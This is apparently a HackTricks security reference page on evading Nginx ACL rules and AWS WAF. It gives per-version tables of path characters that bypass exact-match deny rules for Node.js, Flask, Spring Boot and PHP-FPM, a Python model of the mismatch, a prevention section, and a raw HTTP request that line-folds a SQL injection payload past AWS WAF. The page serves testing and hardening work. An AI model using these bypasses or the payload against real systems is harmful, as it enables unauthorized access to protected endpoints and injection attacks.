HackTricks

Proxy / WAF Protections Bypass

Bypassing Nginx ACL Rules

Nginx restriction example:

    location = /admin {
        deny all;
    }

    location = /admin/ {
        deny all;
    }

NodeJS

  • As Nginx includes the character \xa0 as part of the pathname, the ACL rule for the /admin URI is not triggered. Consequently, Nginx forwards the HTTP message to the backend;
  • When the URI /admin\xa0 is received by the Node.js server, the character \xa0 is removed, allowing successful retrieval of the /admin endpoint.

Nginx Version   Node.js Bypass Characters
1.22.0          \xA0
1.21.6          \xA0
1.20.2          \xA0, \x09, \x0C
1.18.0          \xA0, \x09, \x0C
1.16.1          \xA0, \x09, \x0C

Flask

Flask removes the characters \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B, and \x09 from the URL path, but Nginx doesn't.

Nginx Version   Flask Bypass Characters
1.22.0          \x85, \xA0
1.21.6          \x85, \xA0
1.20.2          \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B
1.18.0          \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B
1.16.1          \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B

Spring Boot

Below is a demonstration of how ACL protection can be circumvented by adding the character \x09 or ; at the end of the pathname:

Nginx Version   Spring Boot Bypass Characters
1.22.0          ;
1.21.6          ;
1.20.2          \x09, ;
1.18.0          \x09, ;
1.16.1          \x09, ;

PHP-FPM

Let's consider the following Nginx FPM configuration:

    location = /admin.php {
        deny all;
    }

    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php8.1-fpm.sock;
    }

It's possible to bypass it by accessing /admin.php/index.php: the exact-match rule for /admin.php does not fire, the regex rule for \.php$ does, and fastcgi-php.conf splits the path so that PHP-FPM executes /admin.php with /index.php as PATH_INFO.

How to prevent

To prevent these issues, you must use the ~ (regex) expression instead of the = (exact match) expression in Nginx ACL rules, for example:

    location ~* ^/admin {
        deny all;
    }
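The following is an added model (not HackTricks' code) of the mismatch behind every case above: nginx evaluates the raw path against its ACL, while each backend routes a normalized one. The strip sets are the union of the per-version tables, the Spring and PHP-FPM normalizations are assumed simplifications, and nginx's own rejection of some control characters in newer versions (the reason the tables vary by version) is not modelled.

```python
import re

# Suffixes the page lists: the control characters, Spring's ';' and the
# PATH_INFO trick for PHP-FPM.
SUFFIXES = ["\x85", "\xa0", "\x1f", "\x1e", "\x1d", "\x1c",
            "\x0c", "\x0b", "\x09", ";", "/index.php"]

def nginx_exact_deny(path, protected):
    """`location = <protected> { deny all; }` (and its `/`-suffixed twin)."""
    return path in (protected, protected + "/")

def nginx_regex_deny(path, protected):
    """The fix from 'How to prevent': `location ~* ^<protected>`, a raw-path prefix match."""
    return re.match("^" + re.escape(protected), path, re.IGNORECASE) is not None

def backend_route(path, backend):
    """Assumed model of what each framework's router sees after its own normalization."""
    if backend == "nodejs":
        return re.sub(r"[\xa0\x09\x0c]", "", path)
    if backend == "flask":
        return re.sub(r"[\x85\xa0\x1f\x1e\x1d\x1c\x0c\x0b\x09]", "", path)
    if backend == "spring":   # tab stripped, ';matrix-params' removed per segment
        return re.sub(r";[^/]*", "", path.replace("\x09", ""))
    if backend == "phpfpm":   # fastcgi_split_path_info: script name kept, PATH_INFO dropped
        m = re.match(r"^(.+?\.php)(/.*)?$", path)
        return m.group(1) if m else path
    raise ValueError(f"unknown backend {backend!r}")

def bypasses(backend, deny_rule):
    """Suffixes that slip past `deny_rule` at nginx yet still reach the protected route."""
    protected = "/admin.php" if backend == "phpfpm" else "/admin"
    found = []
    for s in SUFFIXES:
        raw = protected + s   # e.g. "/admin\xa0" or "/admin.php/index.php"
        if not deny_rule(raw, protected) and backend_route(raw, backend) == protected:
            found.append(s if s.isprintable() else f"\\x{ord(s):02x}")
    return found

if __name__ == "__main__":
    for backend in ("nodejs", "flask", "spring", "phpfpm"):
        print(f"{backend:7} = rule:", bypasses(backend, nginx_exact_deny),
              " ~* rule:", bypasses(backend, nginx_regex_deny))
```

Running it shows every listed suffix reaching the protected route under the `=` rule and none under the `~* ^/admin` rule, because the prefix match fires on the raw path before the backend gets to normalize it.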

Bypassing AWS WAF ACL With Line Folding

It's possible to bypass AWS WAF protection on an HTTP header by using the following syntax: because of the line folding, AWS WAF does not recognise that the X-Query header contains a SQL injection payload, while the Node server behind it does:
GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n